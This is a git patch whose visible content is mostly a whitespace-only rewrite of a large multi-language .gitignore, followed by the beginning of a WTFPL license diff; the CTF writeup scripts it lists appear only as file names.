From 7728c15b1a9609743bef22b04d1c5f0f500763ca Mon Sep 17 00:00:00 2001
From: TooYoungTooSimp <6648049+TooYoungTooSimp@users.noreply.github.com>
Date: Sun, 24 Feb 2019 22:31:06 +0800
Subject: [PATCH] Sun, 24 Feb 2019 22:31:06 +0800
---
 .gitignore | 1858 +++++++++++++++++++-------------------
 LICENSE | 28 +-
 README.md | 4 +-
 l3hsec-writeup/README.md | 26 +-
 l3hsec-writeup/stack.py | 8 +-
 tamu-writeup/pwn1 | Bin 0 -> 7536 bytes
 tamu-writeup/pwn1wp.py | 7 +
 tamu-writeup/pwn2 | Bin 0 -> 7592 bytes
 tamu-writeup/pwn2wp.py | 5 +
 tamu-writeup/pwn4 | Bin 0 -> 7504 bytes
 tamu-writeup/pwn4wp.py | 4 +
 11 files changed, 978 insertions(+), 962 deletions(-)
 create mode 100644 tamu-writeup/pwn1
 create mode 100644 tamu-writeup/pwn1wp.py
 create mode 100644 tamu-writeup/pwn2
 create mode 100644 tamu-writeup/pwn2wp.py
 create mode 100644 tamu-writeup/pwn4
 create mode 100644 tamu-writeup/pwn4wp.py
diff --git a/.gitignore b/.gitignore
index e3d243a..b3244c2 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,929 +1,929 @@ -# ---> Python -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class - -# C extensions -*.so - -# Distribution / packaging -.Python -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib/ -lib64/ -parts/ -sdist/ -var/ -wheels/ -*.egg-info/ -.installed.cfg -*.egg -MANIFEST - -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. -*.manifest -*.spec - -# Installer logs -pip-log.txt -pip-delete-this-directory.txt - -# Unit test / coverage reports -htmlcov/ -.tox/ -.nox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*.cover -.hypothesis/ -.pytest_cache/ - -# Translations -*.mo -*.pot - -# Django stuff: -*.log -local_settings.py -db.sqlite3 - -# Flask stuff: -instance/ -.webassets-cache - -# Scrapy stuff: -.scrapy - -# Sphinx documentation -docs/_build/ - -# PyBuilder -target/ - -# Jupyter Notebook -.ipynb_checkpoints - -# IPython -profile_default/ -ipython_config.py - -# pyenv -.python-version - -# celery beat schedule file -celerybeat-schedule - -# SageMath parsed files -*.sage.py - -# Environments -.env -.venv -env/ -venv/ -ENV/ -env.bak/ -venv.bak/ - -# Spyder project settings -.spyderproject -.spyproject - -# Rope project settings -.ropeproject - -# mkdocs documentation -/site - -# mypy -.mypy_cache/ -.dmypy.json -dmypy.json - -# Pyre type checker -.pyre/ - -# ---> VisualStudio -## Ignore Visual Studio temporary files, build results, and -## files generated by popular Visual Studio add-ons. 
-## -## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore - -# User-specific files -*.rsuser -*.suo -*.user -*.userosscache -*.sln.docstates - -# User-specific files (MonoDevelop/Xamarin Studio) -*.userprefs - -# Build results -[Dd]ebug/ -[Dd]ebugPublic/ -[Rr]elease/ -[Rr]eleases/ -x64/ -x86/ -bld/ -[Bb]in/ -[Oo]bj/ -[Ll]og/ - -# Visual Studio 2015/2017 cache/options directory -.vs/ -# Uncomment if you have tasks that create the project's static files in wwwroot -#wwwroot/ - -# Visual Studio 2017 auto generated files -Generated\ Files/ - -# MSTest test Results -[Tt]est[Rr]esult*/ -[Bb]uild[Ll]og.* - -# NUNIT -*.VisualState.xml -TestResult.xml - -# Build Results of an ATL Project -[Dd]ebugPS/ -[Rr]eleasePS/ -dlldata.c - -# Benchmark Results -BenchmarkDotNet.Artifacts/ - -# .NET Core -project.lock.json -project.fragment.lock.json -artifacts/ - -# StyleCop -StyleCopReport.xml - -# Files built by Visual Studio -*_i.c -*_p.c -*_h.h -*.ilk -*.meta -*.obj -*.iobj -*.pch -*.pdb -*.ipdb -*.pgc -*.pgd -*.rsp -*.sbr -*.tlb -*.tli -*.tlh -*.tmp -*.tmp_proj -*_wpftmp.csproj -*.log -*.vspscc -*.vssscc -.builds -*.pidb -*.svclog -*.scc - -# Chutzpah Test files -_Chutzpah* - -# Visual C++ cache files -ipch/ -*.aps -*.ncb -*.opendb -*.opensdf -*.sdf -*.cachefile -*.VC.db -*.VC.VC.opendb - -# Visual Studio profiler -*.psess -*.vsp -*.vspx -*.sap - -# Visual Studio Trace Files -*.e2e - -# TFS 2012 Local Workspace -$tf/ - -# Guidance Automation Toolkit -*.gpState - -# ReSharper is a .NET coding add-in -_ReSharper*/ -*.[Rr]e[Ss]harper -*.DotSettings.user - -# JustCode is a .NET coding add-in -.JustCode - -# TeamCity is a build add-in -_TeamCity* - -# DotCover is a Code Coverage Tool -*.dotCover - -# AxoCover is a Code Coverage Tool -.axoCover/* -!.axoCover/settings.json - -# Visual Studio code coverage results -*.coverage -*.coveragexml - -# NCrunch -_NCrunch_* -.*crunch*.local.xml -nCrunchTemp_* - -# MightyMoose -*.mm.* -AutoTest.Net/ - -# Web 
workbench (sass) -.sass-cache/ - -# Installshield output folder -[Ee]xpress/ - -# DocProject is a documentation generator add-in -DocProject/buildhelp/ -DocProject/Help/*.HxT -DocProject/Help/*.HxC -DocProject/Help/*.hhc -DocProject/Help/*.hhk -DocProject/Help/*.hhp -DocProject/Help/Html2 -DocProject/Help/html - -# Click-Once directory -publish/ - -# Publish Web Output -*.[Pp]ublish.xml -*.azurePubxml -# Note: Comment the next line if you want to checkin your web deploy settings, -# but database connection strings (with potential passwords) will be unencrypted -*.pubxml -*.publishproj - -# Microsoft Azure Web App publish settings. Comment the next line if you want to -# checkin your Azure Web App publish settings, but sensitive information contained -# in these scripts will be unencrypted -PublishScripts/ - -# NuGet Packages -*.nupkg -# The packages folder can be ignored because of Package Restore -**/[Pp]ackages/* -# except build/, which is used as an MSBuild target. -!**/[Pp]ackages/build/ -# Uncomment if necessary however generally it will be regenerated when needed -#!**/[Pp]ackages/repositories.config -# NuGet v3's project.json files produces more ignorable files -*.nuget.props -*.nuget.targets - -# Microsoft Azure Build Output -csx/ -*.build.csdef - -# Microsoft Azure Emulator -ecf/ -rcf/ - -# Windows Store app package directories and files -AppPackages/ -BundleArtifacts/ -Package.StoreAssociation.xml -_pkginfo.txt -*.appx - -# Visual Studio cache files -# files ending in .cache can be ignored -*.[Cc]ache -# but keep track of directories ending in .cache -!*.[Cc]ache/ - -# Others -ClientBin/ -~$* -*~ -*.dbmdl -*.dbproj.schemaview -*.jfm -*.pfx -*.publishsettings -orleans.codegen.cs - -# Including strong name files can present a security risk -# (https://github.com/github/gitignore/pull/2483#issue-259490424) -#*.snk - -# Since there are multiple workflows, uncomment next line to ignore bower_components -# 
(https://github.com/github/gitignore/pull/1529#issuecomment-104372622) -#bower_components/ - -# RIA/Silverlight projects -Generated_Code/ - -# Backup & report files from converting an old project file -# to a newer Visual Studio version. Backup files are not needed, -# because we have git ;-) -_UpgradeReport_Files/ -Backup*/ -UpgradeLog*.XML -UpgradeLog*.htm -ServiceFabricBackup/ -*.rptproj.bak - -# SQL Server files -*.mdf -*.ldf -*.ndf - -# Business Intelligence projects -*.rdl.data -*.bim.layout -*.bim_*.settings -*.rptproj.rsuser - -# Microsoft Fakes -FakesAssemblies/ - -# GhostDoc plugin setting file -*.GhostDoc.xml - -# Node.js Tools for Visual Studio -.ntvs_analysis.dat -node_modules/ - -# Visual Studio 6 build log -*.plg - -# Visual Studio 6 workspace options file -*.opt - -# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) -*.vbw - -# Visual Studio LightSwitch build output -**/*.HTMLClient/GeneratedArtifacts -**/*.DesktopClient/GeneratedArtifacts -**/*.DesktopClient/ModelManifest.xml -**/*.Server/GeneratedArtifacts -**/*.Server/ModelManifest.xml -_Pvt_Extensions - -# Paket dependency manager -.paket/paket.exe -paket-files/ - -# FAKE - F# Make -.fake/ - -# JetBrains Rider -.idea/ -*.sln.iml - -# CodeRush personal settings -.cr/personal - -# Python Tools for Visual Studio (PTVS) -__pycache__/ -*.pyc - -# Cake - Uncomment if you are using it -# tools/** -# !tools/packages.config - -# Tabs Studio -*.tss - -# Telerik's JustMock configuration file -*.jmconfig - -# BizTalk build output -*.btp.cs -*.btm.cs -*.odx.cs -*.xsd.cs - -# OpenCover UI analysis results -OpenCover/ - -# Azure Stream Analytics local run output -ASALocalRun/ - -# MSBuild Binary and Structured Log -*.binlog - -# NVidia Nsight GPU debugger configuration file -*.nvuser - -# MFractors (Xamarin productivity tool) working folder -.mfractor/ - -# Local History for Visual Studio -.localhistory/ - -# ---> VisualStudioCode -.vscode/* -!.vscode/settings.json 
-!.vscode/tasks.json -!.vscode/launch.json -!.vscode/extensions.json - -# ---> C -# Prerequisites -*.d - -# Object files -*.o -*.ko -*.obj -*.elf - -# Linker output -*.ilk -*.map -*.exp - -# Precompiled Headers -*.gch -*.pch - -# Libraries -*.lib -*.a -*.la -*.lo - -# Shared objects (inc. Windows DLLs) -*.dll -*.so -*.so.* -*.dylib - -# Executables -*.exe -*.out -*.app -*.i*86 -*.x86_64 -*.hex - -# Debug files -*.dSYM/ -*.su -*.idb -*.pdb - -# Kernel Module Compile Results -*.mod* -*.cmd -.tmp_versions/ -modules.order -Module.symvers -Mkfile.old -dkms.conf - -# ---> C++ -# Prerequisites -*.d - -# Compiled Object files -*.slo -*.lo -*.o -*.obj - -# Precompiled Headers -*.gch -*.pch - -# Compiled Dynamic libraries -*.so -*.dylib -*.dll - -# Fortran module files -*.mod -*.smod - -# Compiled Static libraries -*.lai -*.la -*.a -*.lib - -# Executables -*.exe -*.out -*.app - -# ---> CMake -CMakeCache.txt -CMakeFiles -CMakeScripts -Testing -Makefile -cmake_install.cmake -install_manifest.txt -compile_commands.json -CTestTestfile.cmake - -# ---> Go -# Binaries for programs and plugins -*.exe -*.exe~ -*.dll -*.so -*.dylib - -# Test binary, build with `go test -c` -*.test - -# Output of the go coverage tool, specifically when used with LiteIDE -*.out - -# ---> Android -# Built application files -*.apk -*.ap_ -*.aab - -# Files for the ART/Dalvik VM -*.dex - -# Java class files -*.class - -# Generated files -bin/ -gen/ -out/ - -# Gradle files -.gradle/ -build/ - -# Local configuration file (sdk path, etc) -local.properties - -# Proguard folder generated by Eclipse -proguard/ - -# Log Files -*.log - -# Android Studio Navigation editor temp files -.navigation/ - -# Android Studio captures folder -captures/ - -# IntelliJ -*.iml -.idea/workspace.xml -.idea/tasks.xml -.idea/gradle.xml -.idea/assetWizardSettings.xml -.idea/dictionaries -.idea/libraries -.idea/caches - -# Keystore files -# Uncomment the following lines if you do not want to check your keystore files in. 
-#*.jks -#*.keystore - -# External native build folder generated in Android Studio 2.2 and later -.externalNativeBuild - -# Google Services (e.g. APIs or Firebase) -google-services.json - -# Freeline -freeline.py -freeline/ -freeline_project_description.json - -# fastlane -fastlane/report.xml -fastlane/Preview.html -fastlane/screenshots -fastlane/test_output -fastlane/readme.md - -# ---> Perl -!Build/ -.last_cover_stats -/META.yml -/META.json -/MYMETA.* -*.o -*.pm.tdy -*.bs - -# Devel::Cover -cover_db/ - -# Devel::NYTProf -nytprof.out - -# Dizt::Zilla -/.build/ - -# Module::Build -_build/ -Build -Build.bat - -# Module::Install -inc/ - -# ExtUtils::MakeMaker -/blib/ -/_eumm/ -/*.gz -/Makefile -/Makefile.old -/MANIFEST.bak -/pm_to_blib -/*.zip - -# ---> Perl6 -# Gitignore for Perl 6 (http://www.perl6.org) -# As part of https://github.com/github/gitignore - -# precompiled files -.precomp -lib/.precomp - - -# ---> JetBrains -# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm -# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 - -# User-specific stuff -.idea/**/workspace.xml -.idea/**/tasks.xml -.idea/**/usage.statistics.xml -.idea/**/dictionaries -.idea/**/shelf - -# Generated files -.idea/**/contentModel.xml - -# Sensitive or high-churn files -.idea/**/dataSources/ -.idea/**/dataSources.ids -.idea/**/dataSources.local.xml -.idea/**/sqlDataSources.xml -.idea/**/dynamic.xml -.idea/**/uiDesigner.xml -.idea/**/dbnavigator.xml - -# Gradle -.idea/**/gradle.xml -.idea/**/libraries - -# Gradle and Maven with auto-import -# When using Gradle or Maven with auto-import, you should exclude module files, -# since they will be recreated, and may cause churn. Uncomment if using -# auto-import. 
-# .idea/modules.xml -# .idea/*.iml -# .idea/modules - -# CMake -cmake-build-*/ - -# Mongo Explorer plugin -.idea/**/mongoSettings.xml - -# File-based project format -*.iws - -# IntelliJ -out/ - -# mpeltonen/sbt-idea plugin -.idea_modules/ - -# JIRA plugin -atlassian-ide-plugin.xml - -# Cursive Clojure plugin -.idea/replstate.xml - -# Crashlytics plugin (for Android Studio and IntelliJ) -com_crashlytics_export_strings.xml -crashlytics.properties -crashlytics-build.properties -fabric.properties - -# Editor-based Rest Client -.idea/httpRequests - -# Android studio 3.1+ serialized cache file -.idea/caches/build_file_checksums.ser - -# ---> Kotlin -# Compiled class file -*.class - -# Log file -*.log - -# BlueJ files -*.ctxt - -# Mobile Tools for Java (J2ME) -.mtj.tmp/ - -# Package Files # -*.jar -*.war -*.nar -*.ear -*.zip -*.tar.gz -*.rar - -# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml -hs_err_pid* - -# ---> Linux -*~ - -# temporary files which can be created if a process still has a handle open of a deleted file -.fuse_hidden* - -# KDE directory preferences -.directory - -# Linux trash folder which might appear on any partition or disk -.Trash-* - -# .nfs files are created when an open file is removed but is still being accessed -.nfs* - -# ---> MicrosoftOffice -*.tmp - -# Word temporary -~$*.doc* - -# Word Auto Backup File -Backup of *.doc* - -# Excel temporary -~$*.xls* - -# Excel Backup File -*.xlk - -# PowerPoint temporary -~$*.ppt* - -# Visio autosave temporary files -*.~vsd* - -# ---> MonoDevelop -#User Specific -*.userprefs -*.usertasks - -#Mono Project Files -*.pidb -*.resources -test-results/ - -# ---> Node -# Logs -logs -*.log -npm-debug.log* -yarn-debug.log* -yarn-error.log* - -# Runtime data -pids -*.pid -*.seed -*.pid.lock - -# Directory for instrumented libs generated by jscoverage/JSCover -lib-cov - -# Coverage directory used by tools like istanbul -coverage - -# nyc test coverage -.nyc_output - -# Grunt 
intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) -.grunt - -# Bower dependency directory (https://bower.io/) -bower_components - -# node-waf configuration -.lock-wscript - -# Compiled binary addons (https://nodejs.org/api/addons.html) -build/Release - -# Dependency directories -node_modules/ -jspm_packages/ - -# TypeScript v1 declaration files -typings/ - -# Optional npm cache directory -.npm - -# Optional eslint cache -.eslintcache - -# Optional REPL history -.node_repl_history - -# Output of 'npm pack' -*.tgz - -# Yarn Integrity file -.yarn-integrity - -# dotenv environment variables file -.env - -# parcel-bundler cache (https://parceljs.org/) -.cache - -# next.js build output -.next - -# nuxt.js build output -.nuxt - -# vuepress build output -.vuepress/dist - -# Serverless directories -.serverless - -# FuseBox cache -.fusebox/ - -# ---> Windows -# Windows thumbnail cache files -Thumbs.db -ehthumbs.db -ehthumbs_vista.db - -# Dump file -*.stackdump - -# Folder config file -[Dd]esktop.ini - -# Recycle Bin used on file shares -$RECYCLE.BIN/ - -# Windows Installer files -*.cab -*.msi -*.msix -*.msm -*.msp - -# Windows shortcuts -*.lnk - +# ---> Python +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. 
+*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ +.pytest_cache/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# ---> VisualStudio +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. 
+## +## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUNIT +*.VisualState.xml +TestResult.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# JustCode is a .NET coding add-in +.JustCode + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web 
workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# 
(https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# JetBrains Rider +.idea/ +*.sln.iml + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# ---> VisualStudioCode +.vscode/* +!.vscode/settings.json 
+!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json + +# ---> C +# Prerequisites +*.d + +# Object files +*.o +*.ko +*.obj +*.elf + +# Linker output +*.ilk +*.map +*.exp + +# Precompiled Headers +*.gch +*.pch + +# Libraries +*.lib +*.a +*.la +*.lo + +# Shared objects (inc. Windows DLLs) +*.dll +*.so +*.so.* +*.dylib + +# Executables +*.exe +*.out +*.app +*.i*86 +*.x86_64 +*.hex + +# Debug files +*.dSYM/ +*.su +*.idb +*.pdb + +# Kernel Module Compile Results +*.mod* +*.cmd +.tmp_versions/ +modules.order +Module.symvers +Mkfile.old +dkms.conf + +# ---> C++ +# Prerequisites +*.d + +# Compiled Object files +*.slo +*.lo +*.o +*.obj + +# Precompiled Headers +*.gch +*.pch + +# Compiled Dynamic libraries +*.so +*.dylib +*.dll + +# Fortran module files +*.mod +*.smod + +# Compiled Static libraries +*.lai +*.la +*.a +*.lib + +# Executables +*.exe +*.out +*.app + +# ---> CMake +CMakeCache.txt +CMakeFiles +CMakeScripts +Testing +Makefile +cmake_install.cmake +install_manifest.txt +compile_commands.json +CTestTestfile.cmake + +# ---> Go +# Binaries for programs and plugins +*.exe +*.exe~ +*.dll +*.so +*.dylib + +# Test binary, build with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# ---> Android +# Built application files +*.apk +*.ap_ +*.aab + +# Files for the ART/Dalvik VM +*.dex + +# Java class files +*.class + +# Generated files +bin/ +gen/ +out/ + +# Gradle files +.gradle/ +build/ + +# Local configuration file (sdk path, etc) +local.properties + +# Proguard folder generated by Eclipse +proguard/ + +# Log Files +*.log + +# Android Studio Navigation editor temp files +.navigation/ + +# Android Studio captures folder +captures/ + +# IntelliJ +*.iml +.idea/workspace.xml +.idea/tasks.xml +.idea/gradle.xml +.idea/assetWizardSettings.xml +.idea/dictionaries +.idea/libraries +.idea/caches + +# Keystore files +# Uncomment the following lines if you do not want to check your keystore files in. 
+#*.jks +#*.keystore + +# External native build folder generated in Android Studio 2.2 and later +.externalNativeBuild + +# Google Services (e.g. APIs or Firebase) +google-services.json + +# Freeline +freeline.py +freeline/ +freeline_project_description.json + +# fastlane +fastlane/report.xml +fastlane/Preview.html +fastlane/screenshots +fastlane/test_output +fastlane/readme.md + +# ---> Perl +!Build/ +.last_cover_stats +/META.yml +/META.json +/MYMETA.* +*.o +*.pm.tdy +*.bs + +# Devel::Cover +cover_db/ + +# Devel::NYTProf +nytprof.out + +# Dizt::Zilla +/.build/ + +# Module::Build +_build/ +Build +Build.bat + +# Module::Install +inc/ + +# ExtUtils::MakeMaker +/blib/ +/_eumm/ +/*.gz +/Makefile +/Makefile.old +/MANIFEST.bak +/pm_to_blib +/*.zip + +# ---> Perl6 +# Gitignore for Perl 6 (http://www.perl6.org) +# As part of https://github.com/github/gitignore + +# precompiled files +.precomp +lib/.precomp + + +# ---> JetBrains +# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm +# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 + +# User-specific stuff +.idea/**/workspace.xml +.idea/**/tasks.xml +.idea/**/usage.statistics.xml +.idea/**/dictionaries +.idea/**/shelf + +# Generated files +.idea/**/contentModel.xml + +# Sensitive or high-churn files +.idea/**/dataSources/ +.idea/**/dataSources.ids +.idea/**/dataSources.local.xml +.idea/**/sqlDataSources.xml +.idea/**/dynamic.xml +.idea/**/uiDesigner.xml +.idea/**/dbnavigator.xml + +# Gradle +.idea/**/gradle.xml +.idea/**/libraries + +# Gradle and Maven with auto-import +# When using Gradle or Maven with auto-import, you should exclude module files, +# since they will be recreated, and may cause churn. Uncomment if using +# auto-import. 
+# .idea/modules.xml +# .idea/*.iml +# .idea/modules + +# CMake +cmake-build-*/ + +# Mongo Explorer plugin +.idea/**/mongoSettings.xml + +# File-based project format +*.iws + +# IntelliJ +out/ + +# mpeltonen/sbt-idea plugin +.idea_modules/ + +# JIRA plugin +atlassian-ide-plugin.xml + +# Cursive Clojure plugin +.idea/replstate.xml + +# Crashlytics plugin (for Android Studio and IntelliJ) +com_crashlytics_export_strings.xml +crashlytics.properties +crashlytics-build.properties +fabric.properties + +# Editor-based Rest Client +.idea/httpRequests + +# Android studio 3.1+ serialized cache file +.idea/caches/build_file_checksums.ser + +# ---> Kotlin +# Compiled class file +*.class + +# Log file +*.log + +# BlueJ files +*.ctxt + +# Mobile Tools for Java (J2ME) +.mtj.tmp/ + +# Package Files # +*.jar +*.war +*.nar +*.ear +*.zip +*.tar.gz +*.rar + +# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml +hs_err_pid* + +# ---> Linux +*~ + +# temporary files which can be created if a process still has a handle open of a deleted file +.fuse_hidden* + +# KDE directory preferences +.directory + +# Linux trash folder which might appear on any partition or disk +.Trash-* + +# .nfs files are created when an open file is removed but is still being accessed +.nfs* + +# ---> MicrosoftOffice +*.tmp + +# Word temporary +~$*.doc* + +# Word Auto Backup File +Backup of *.doc* + +# Excel temporary +~$*.xls* + +# Excel Backup File +*.xlk + +# PowerPoint temporary +~$*.ppt* + +# Visio autosave temporary files +*.~vsd* + +# ---> MonoDevelop +#User Specific +*.userprefs +*.usertasks + +#Mono Project Files +*.pidb +*.resources +test-results/ + +# ---> Node +# Logs +logs +*.log +npm-debug.log* +yarn-debug.log* +yarn-error.log* + +# Runtime data +pids +*.pid +*.seed +*.pid.lock + +# Directory for instrumented libs generated by jscoverage/JSCover +lib-cov + +# Coverage directory used by tools like istanbul +coverage + +# nyc test coverage +.nyc_output + +# Grunt 
intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) +.grunt + +# Bower dependency directory (https://bower.io/) +bower_components + +# node-waf configuration +.lock-wscript + +# Compiled binary addons (https://nodejs.org/api/addons.html) +build/Release + +# Dependency directories +node_modules/ +jspm_packages/ + +# TypeScript v1 declaration files +typings/ + +# Optional npm cache directory +.npm + +# Optional eslint cache +.eslintcache + +# Optional REPL history +.node_repl_history + +# Output of 'npm pack' +*.tgz + +# Yarn Integrity file +.yarn-integrity + +# dotenv environment variables file +.env + +# parcel-bundler cache (https://parceljs.org/) +.cache + +# next.js build output +.next + +# nuxt.js build output +.nuxt + +# vuepress build output +.vuepress/dist + +# Serverless directories +.serverless + +# FuseBox cache +.fusebox/ + +# ---> Windows +# Windows thumbnail cache files +Thumbs.db +ehthumbs.db +ehthumbs_vista.db + +# Dump file +*.stackdump + +# Folder config file +[Dd]esktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Windows Installer files +*.cab +*.msi +*.msix +*.msm +*.msp + +# Windows shortcuts +*.lnk + diff --git a/LICENSE b/LICENSE index 9c31dda..6976e22 100644 --- a/LICENSE +++ b/LICENSE 
@@ -1,14 +1,14 @@
-DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
-
-Version 2, December 2004
-
-Copyright (C) 2004 Sam Hocevar
-
-Everyone is permitted to copy and distribute verbatim or modified copies of
